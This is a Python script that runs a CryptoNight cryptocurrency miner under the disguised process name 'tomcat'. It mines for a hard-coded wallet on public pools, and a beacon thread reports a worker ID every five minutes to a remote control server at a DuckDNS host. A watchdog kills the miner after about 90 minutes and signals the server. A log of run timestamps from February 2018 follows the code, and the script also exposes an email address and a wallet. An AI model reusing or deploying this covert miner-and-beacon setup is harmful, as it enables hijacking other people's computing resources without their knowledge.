import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:14:04.513225
#2018-02-17 17:02:04.103880
#2018-02-17 18:49:04.717570
#2018-02-17 20:36:04.559101
#2018-02-17 22:22:04.506191
#2018-02-18 00:06:06.514764
#2018-02-18 01:57:03.408259
#2018-02-18 03:45:06.772809
#2018-02-18 05:33:04.914022
#2018-02-18 07:26:04.087473
#2018-02-18 09:13:06.859573
#2018-02-18 10:59:01.840610
#2018-02-18 12:45:06.943799
#2018-02-18 14:33:06.101688
#2018-02-18 16:24:01.931882
#2018-02-18 18:13:07.086628
#2018-02-18 19:59:06.082458
#2018-02-18 21:46:04.306927
#2018-02-18 23:34:07.082515
#2018-02-19 01:20:07.651490
#2018-02-19 03:09:03.855288
#2018-02-19 04:54:01.328509
#2018-02-19 06:39:04.141422
#2018-02-19 08:29:07.615994
#2018-02-19 10:18:05.949183
#2018-02-19 12:06:08.795486
#2018-02-19 13:54:06.720884
#2018-02-19 15:45:04.041922
#2018-02-19 17:33:09.332536
#2018-02-19 19:22:04.319157
#2018-02-19 21:10:07.994983
#2018-02-19 22:57:07.814772
#2018-02-20 00:40:01.336970
#2018-02-20 02:28:04.470957
#2018-02-20 04:18:06.407681
#2018-02-20 06:02:06.729775
#2018-02-20 07:47:05.800552
#2018-02-20 09:33:01.414461
#2018-02-20 11:17:02.161892
#2018-02-20 13:04:04.784196
#2018-02-20 14:48:10.936055
#2018-02-20 16:35:02.948671
#2018-02-20 18:22:07.743165
#2018-02-20 20:14:01.264615
#2018-02-20 22:00:01.739569
#2018-02-20 23:41:08.134890
#2018-02-21 01:25:08.768378
#2018-02-21 03:14:08.010121
#2018-02-21 05:02:07.539070
#2018-02-21 06:50:07.430090
#2018-02-21 08:38:06.583978
#2018-02-21 10:24:01.618966
#2018-02-21 12:12:10.372907
#2018-02-21 14:01:01.359491
#2018-02-21 15:45:13.071907
#2018-02-21 17:37:01.275392
#2018-02-21 19:23:09.042964
#2018-02-21 21:13:06.140588
#2018-02-21 22:59:07.253672
#2018-02-22 00:46:07.597941
#2018-02-22 02:34:02.121033
#2018-02-22 04:20:04.202939
#2018-02-22 06:05:06.312484
#2018-02-22 07:51:07.908029
#2018-02-22 09:41:07.891194
#2018-02-22 11:26:08.850654
#2018-02-22 13:12:02.240353
#2018-02-22 15:01:04.234496
#2018-02-22 16:45:13.345898
#2018-02-22 18:36:01.711037
#2018-02-22 20:28:07.820698
#2018-02-22 22:16:04.408510
#2018-02-23 00:02:06.791970
#2018-02-23 01:49:07.732423
#2018-02-23 03:38:03.709209
#2018-02-23 05:23:07.468458
#2018-02-23 07:10:07.833105
#2018-02-23 09:14:01.315817
#2018-02-23 11:21:08.532898
#2018-02-23 13:13:04.150152
#2018-02-23 14:59:10.292985
#2018-02-23 16:47:09.529836
#2018-02-23 18:32:04.576270
#2018-02-23 20:18:06.140369
#2018-02-23 22:07:01.428019
#2018-02-23 23:55:07.504810
#2018-02-24 01:45:07.220749
#2018-02-24 03:37:01.974326
#2018-02-24 05:21:01.372602
#2018-02-24 07:09:05.820589
#2018-02-24 08:58:04.629814
#2018-02-24 10:39:07.438086
#2018-02-24 12:25:06.179856
#2018-02-24 14:18:06.353555
#2018-02-24 16:06:01.970465
#2018-02-24 17:57:04.900217
#2018-02-24 19:44:07.500774
#2018-02-24 21:30:06.578719
#2018-02-25 00:15:04.057297
#2018-02-25 04:09:04.475672
#2018-02-25 07:39:03.826167